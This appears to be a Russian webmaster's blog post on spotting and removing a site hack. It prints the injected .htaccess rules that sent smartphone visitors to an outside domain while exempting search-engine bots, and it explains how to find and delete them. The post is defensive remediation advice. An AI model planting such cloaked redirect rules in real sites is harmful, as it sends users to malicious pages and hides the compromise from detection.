Яндекс.Метрика
29.03.2015
Категории: Исследования

Ваш сайт взломали! Как найти и устранить беду

Итак, что мы имеем?

В поиске Яндекса этому сайту стала приписываться вот такая надпись:

Сайт может угрожать безопасности вашего компьютера или мобильного устройства

При переходе на сайт ничего страшного не происходит. Это потому что вирус или скорее дор ориентирован на мобильные устройства и планшеты. И если зайти на сайт с какого нибудь смартфона, то вас перекинут на какой-то левый сайт, в данном случае, это сайт onlineg4.net.

Вот такой код залили злоумышленники в файлик .htaccess на хостинге:

RewriteCond   %{HTTP_USER_AGENT} (android | midp | j2me | symbian | series\ 60 | symbos | windows\ mobile | windows\ ce | ppc | smartphone | blackberry | mtk | bada | windows\ phone) [NC]

RewriteCond   %{HTTP_USER_AGENT} !(accoona | ia_archiver | antabot | ask\ jeeves | baidu | dcpbot | eltaindexer | feedfetcher | gamespy | gigabot | googlebot | gsa-crawler | grub-client | gulper | slurp | mihalism | msnbot | worldindexer | ooyyo | pagebull | scooter | w3c_validator | jigsaw | webalta | yahoofeedseeker | yahoo!\ slurp | mmcrawler | yandexbot | yandeximages | yandexvideo | yandexmedia | yandexblogs | yandexaddurl |
yandexfavicons | yandexdirect | yandexmetrika | yandexcatalog | yandexnews | yandeximageresizer)   [NC]

RewriteRule   (.*)   http://onlineg4.net/u/9024   [L,R=302]

Тут не сложно было догадаться и найти его, как правило такой вредоносный редирект ставят в начале файла. Его можно с легкостью удалить и писать в Яндекс о том, что теперь с сайтом все в порядке и его стоит исключить из черного списка.

Более того, хочу сказать, что если у вас или ваших посетителей будет установлен антивирус Касперского, то ваш сайт еще поместят в черный список баз Касперского. После очистки сайта стоит еще писать в тех.поддержку Касперского с просьбой удалить сайт из их черного списка, а то пользователи никогда не попадут на ваш сайт.

Вот такой вот случай произошел, скажу он не редкость и, как правило, его легко устранить. Достаточно элементарных знаний кода:

  • просматриваем файлик .htaccess, который лежит в корне вашего сайта;
  • ищем в нем, как правило в начале, домен какого-то левого сайта, к которому вы не имеете отношения;
  • ищем слова похожие на android | midp | j2me | symbian | series\ 60 | symbos | windows\ mobile | windows\ ce | ppc | smartphone | blackberry | mtk | bada | windows\ phone, то есть это с каких операционных систем люди будут перенаправляться на левый сайт;
  • ищем название ботов gamespy | gigabot | googlebot | gsa-crawler | grub-client | gulper | slurp | mihalism | msnbot | worldindexer | ooyyo | pagebull | scooter | w3c_validator | jigsaw | webalta | yahoofeedseeker | yahoo;
  • и самое последнее, ищем 302 редирект, потому что ставят именно его, не знаю с чем это связано, может они верят, что 302 редирект — это временный редирект.

Вот так можно выявить взлом сайта. Удачи и защищайте свои сайты от коварных злоумышленников.

Рекомендую почитать

Развязка истории про заработок на кликах... Привет, друзья, это вторая часть исследования копирайтерских бирж и итог этой истории с заказной статьей В первой части статьи я писал о начале э...
Новый фильтр Яндекса АГС Сегодня кратко, но по делу хочется высказаться по новому фильтру АГС у Яндекса. Я провел мини-исследование Данный материал является моим личным м...
Анализ запросов для продвижения... Получает ли пользователь ответ на свой запрос? Итак, хотелось бы начать сразу с сути статьи: на каком этапе поиска пользователь получает ответ на с...
Как Кокос отжимает клиентов у сеошников... Привет, сегодня один мой знакомый рассказал мне историю про то, как у него контора Кокос отжала сайт. Случилось это очень неожиданно, но более удивите...
Как продает товары интернет-магазин Ламода... Привет, друзья, долго не писал, но на то были причины – строил и проектировал большие планы. И наткнулся на PR-кампанию интернет-магазина Lamoda, стал...
comments powered by HyperComments

Хотите получать
мои статьи
почтой?

Адреса электронной почты не разглашаются и не предоставляются третьим лицам для коммерческого или некоммерческого использования.

Последние комментарии